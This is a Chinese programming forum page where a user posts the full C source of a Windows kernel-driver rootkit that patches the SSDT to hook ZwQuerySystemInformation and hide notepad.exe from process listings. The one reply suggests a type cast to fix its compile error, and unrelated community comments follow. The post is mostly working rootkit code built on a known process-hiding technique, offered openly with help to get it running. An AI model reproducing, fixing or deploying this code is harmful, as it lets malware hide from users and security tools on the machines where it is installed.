1. #include "ntddk.h"
  2. #define BOOL int
  3. #pragma pack(1)
  4. typedef struct ServiceDescriptorEntry {
  5. unsigned int *ServiceTableBase;
  6. unsigned int *ServiceCounterTableBase; //仅适用于checked build版本
  7. unsigned int NumberOfServices;
  8. unsigned char *ParamTableBase;
  9. } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
  10. #pragma pack()
  11. __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
  12. //获得SSDT基址宏
  13. #define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
  14. //获得函数在SSDT中的索引宏
  15. #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
  16. //调换自己的hook函数与原系统函数的地址
  17. #define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
  18. _Orig = (PVOID)InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
  19. //卸载hook函数
  20. #define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
  21. InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
  22. PMDL g_pmdlSystemCall;
  23. PVOID *MappedSystemCallTable;
  24. //以下为隐藏进程用的结构
  25. struct _SYSTEM_THREADS
  26. {
  27. LARGE_INTEGER KernelTime;
  28. LARGE_INTEGER UserTime;
  29. LARGE_INTEGER CreateTime;
  30. ULONG WaitTime;
  31. PVOID StartAddress;
  32. CLIENT_ID ClientIs;
  33. KPRIORITY Priority;
  34. KPRIORITY BasePriority;
  35. ULONG ContextSwitchCount;
  36. ULONG ThreadState;
  37. KWAIT_REASON WaitReason;
  38. };
  39. struct _SYSTEM_PROCESSES
  40. {
  41. ULONG NextEntryDelta;
  42. ULONG ThreadCount;
  43. ULONG Reserved[6];
  44. LARGE_INTEGER CreateTime;
  45. LARGE_INTEGER UserTime;
  46. LARGE_INTEGER KernelTime;
  47. UNICODE_STRING ProcessName;
  48. KPRIORITY BasePriority;
  49. ULONG ProcessId;
  50. ULONG InheritedFromProcessId;
  51. ULONG HandleCount;
  52. ULONG Reserved2[2];
  53. VM_COUNTERS VmCounters;
  54. IO_COUNTERS IoCounters; //windows 2000 only
  55. struct _SYSTEM_THREADS Threads[1];
  56. };
  57. // Added by Creative of rootkit.com
  58. struct _SYSTEM_PROCESSOR_TIMES
  59. {
  60. LARGE_INTEGER IdleTime;
  61. LARGE_INTEGER KernelTime;
  62. LARGE_INTEGER UserTime;
  63. LARGE_INTEGER DpcTime;
  64. LARGE_INTEGER InterruptTime;
  65. ULONG InterruptCount;
  66. };
  67. extern "C"NTSYSAPI
  68. NTSTATUS
  69. NTAPI ZwQuerySystemInformation(
  70. IN ULONG SystemInformationClass,
  71. IN PVOID SystemInformation,
  72. IN ULONG SystemInformationLength,
  73. OUT PULONG ReturnLength);
  74. typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
  75. ULONG SystemInformationCLass,
  76. PVOID SystemInformation,
  77. ULONG SystemInformationLength,
  78. PULONG ReturnLength
  79. );
  80. ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
  81. LARGE_INTEGER m_UserTime;
  82. LARGE_INTEGER m_KernelTime;
  83. //我们的hook函数,过滤掉notepad.exe的进程
  84. NTSTATUS NewZwQuerySystemInformation(
  85. IN ULONG SystemInformationClass,
  86. IN PVOID SystemInformation,
  87. IN ULONG SystemInformationLength,
  88. OUT PULONG ReturnLength)
  89. {
  90. NTSTATUS ntStatus;
  91. ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
  92. SystemInformationClass,
  93. SystemInformation,
  94. SystemInformationLength,
  95. ReturnLength );
  96. if( NT_SUCCESS(ntStatus))
  97. {
  98. // Asking for a file and directory listing
  99. if(SystemInformationClass == 5)
  100. {
  101. // 列举系统进程链表
  102. struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
  103. struct _SYSTEM_PROCESSES *prev = NULL;
  104. while(curr)
  105. {
  106. if (curr->ProcessName.Buffer != NULL)
  107. {
  108. if(0 == memcmp(curr->ProcessName.Buffer, L"notepad.exe", 22))
  109. {
  110. // m_UserTime.QuadPart += curr->UserTime.QuadPart;
  111. // m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
  112. if(prev) // Middle or Last entry
  113. {
  114. if(curr->NextEntryDelta)
  115. prev->NextEntryDelta += curr->NextEntryDelta;
  116. else // we are last, so make prev the end
  117. prev->NextEntryDelta = 0;
  118. }
  119. else
  120. {
  121. if(curr->NextEntryDelta)
  122. {
  123. // we are first in the list, so move it forward
  124. SystemInformation =(char *)SystemInformation+ curr->NextEntryDelta;
  125. }
  126. else // 唯一的进程
  127. SystemInformation = NULL;
  128. }
  129. }
  130. }
  131. else // Idle process入口
  132. {
  133. // 把_root_进程的时间加给Idle进程,Idle称空闲时间
  134. // curr->UserTime.QuadPart += m_UserTime.QuadPart;
  135. // curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
  136. // 重设时间,为下一次过滤
  137. // m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
  138. }
  139. prev = curr;
  140. if(curr->NextEntryDelta) curr = curr+curr->NextEntryDelta;
  141. }
  142. }
  143. }
  144. return ntStatus;
  145. }
  146. VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
  147. {
  148. DbgPrint("ROOTKIT: OnUnload called\n");
  149. // 卸载hook
  150. UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );
  151. // 解索并释放MDL
  152. if(g_pmdlSystemCall)
  153. {
  154. MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
  155. IoFreeMdl(g_pmdlSystemCall);
  156. }
  157. }
  158. NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
  159. IN PUNICODE_STRING theRegistryPath)
  160. {
  161. DbgPrint("ROOTKIT: Start\n");
  162. theDriverObject->DriverUnload = OnUnload;
  163. // 初始化全局时间为零
  164. // 这将会解决时间问题,如果不这样,尽管隐藏了进程,但时间的消耗会不变,cpu 100%
  165. m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
  166. OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
  167. g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4); // 储存旧的函数地址
  168. if(!g_pmdlSystemCall)
  169. {
  170. return STATUS_UNSUCCESSFUL;
  171. }
  172. MmBuildMdlForNonPagedPool(g_pmdlSystemCall); // 改变MDL的Flags属性为可写,既然可写当然可读,可执行
  173. g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
  174. MappedSystemCallTable =(PVOID*) MmMapLockedPages(g_pmdlSystemCall, KernelMode); // 用了宏,把原来的Zw*替换成我们的New*函数。至此已完成了我们的主要两步,先突破了SSDT的保护,接着用宏更改了目标函数,下来就剩下具体的过滤任务了
  175. HOOK_SYSCALL(ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
  176. return STATUS_SUCCESS;
  177. }
上传的附件
你的回答被采纳后将获得: 3点积分 (将会扣除手续费1点积分。)

keyboard_arrow_left上一篇 : 可以问一下站内那个基于Java的办公自动化系统怎么导入与运行吗 "WRITE-BUG技术共享平台"哪个版块你最讨厌 : 下一篇keyboard_arrow_right

1个回答

Tattoo
2020-02-17 11:22:24

感觉意思是无法从 PVOID 类型转换为 ZWQUERYSYSTEMINFORMATION 类型;
解决方法:尝试下类型强制转换

精彩评论

  • [算法问题] 谁逃课了
    哈哈,一开始还以为是吐槽帖,没想是问问题啊。。。顺便解答下你的问题吧。 bA, bB, bC, bD, bE 来表示A、B、C、D、E,true表示逃课,false表示不逃课,原理比较简单,就是暴力枚举 bA, bB, bC, bD, bE,然后判断是否满足给出的 5 个条件,代码如下所示: bool judge(bool bA, bool bB, bool bC, bool bD, bool bE){ bool bRet = false; do { // (1)如果A逃课,B也一定逃课 if (true == bA) { if (true == bB) { // 条件(1)成立 } else { // 条件(1)不成立 break; } } // (2)B和C中有且只有一个人参与逃课 if (true == (bB || bC) && false == (bB && bC)) { // 条件(2)成立 } else { // 条件(2)不成立 break; } // (3)C和D要么都逃,要么都不逃 if (true == bC) { if (true == bD) { // 条件(3)成立 } else { // 条件(3)不成立 break; } } else { if (false == bD) { // 条件(3)成立 } else { // 条件(3)不成立 break; } } // (4)D和E至少有一个人逃了 if (true == (bD || bE)) { // 条件(4)成立 } else { // 条件(4)不成立 break; } // (5)如果E逃课,则A和D一定参与逃课 if (true == bE) { if ((true == bA) && (true == bD)) { // 条件(5)成立 } else { // 条件(5)不成立 break; } } // 所有条件都满足 bRet = true; } while (false); return bRet;}int _tmain(int argc, _TCHAR* argv[]){ int a = 0, b = 0, c = 0, d = 0, e = 0; bool bA = false, bB = false, bC = false, bD = false, bE = false; for (a = 0; a < 2; a++) { for (b = 0; b < 2; b++) { for (c = 0; c < 2; c++) { for (d = 0; d < 2; d++) { for (e = 0; e < 2; e++) { bA = (bool)a; bB = (bool)b; bC = (bool)c; bD = (bool)d; bE = (bool)e; // 判断 if (true == judge(bA, bB, bC, bD, bE)) { if (true == bA) { printf("A"); } if (true == bB) { printf("B"); } if (true == bC) { printf("C"); } if (true == bD) { printf("D"); } if (true == bE) { printf("E"); } printf("\n"); } } } } } } return 0;} 运行程序,结果显示:CD,则表示C和D逃课满足上述5个条件~~~
    2020-07-12 12:15:34 thumb_up( 2 )
  • 可以问一下站内那个基于Java的办公自动化系统怎么导入与运行吗
    你是用什么软件开发Java程序?我学生用的是eclipse软件如果你是用eclipse的话:1.file中找到import(鼠标右键也可以找到)2.点击Existing Project into Workspace3.在select root directory右边点击Browse4.查找需要导入的工程文件就行了
    2020-03-09 13:30:36 thumb_up( 3 )
  • [算法问题] 谁逃课了
    像这道题,直接printf输出结果,会不会就过了呢??
    2020-07-14 11:22:42 thumb_up( 1 )
  • 说说最近的感想吧(最佳答案不止一个)
    最近一直在学JAVA,有不懂的可以交流
    2020-06-28 23:56:25 thumb_up( 1 )
  • 用c对无向图领接表的存盘,读盘并输出邻接表
    这是数据结构中图的知识点吧,一言难尽啊!自己也忘得差不多了,定义出无向图的数据结构(点数、边数、点和边),用链表结构来存储邻接表?最后实现图的遍历。。
    2020-06-30 12:56:29 thumb_up( 2 )
  • 想学游戏开发,应该直接学习游戏引擎还是从游戏引擎原理学起呢?
    从事3年的游戏客户端开发,我的建议是直接学习现成的游戏引擎。理由1、容易出作品能增加自己的积极性2、方便之后出来找工作3、并不会妨碍到自己学习游戏原理,问题是你是否多思考,(当你使用引擎的某个功能并带有好奇的时候,你会发现网上很多人都有相同的疑问,很多大神都会贴出自己完整的思路)4、可能做游戏会和你想象中的不太一样,直接上手用引擎就是在做游戏,如果发现不合适,也可以尽早退出
    2019-03-24 18:12:39 thumb_up( 4 )
eject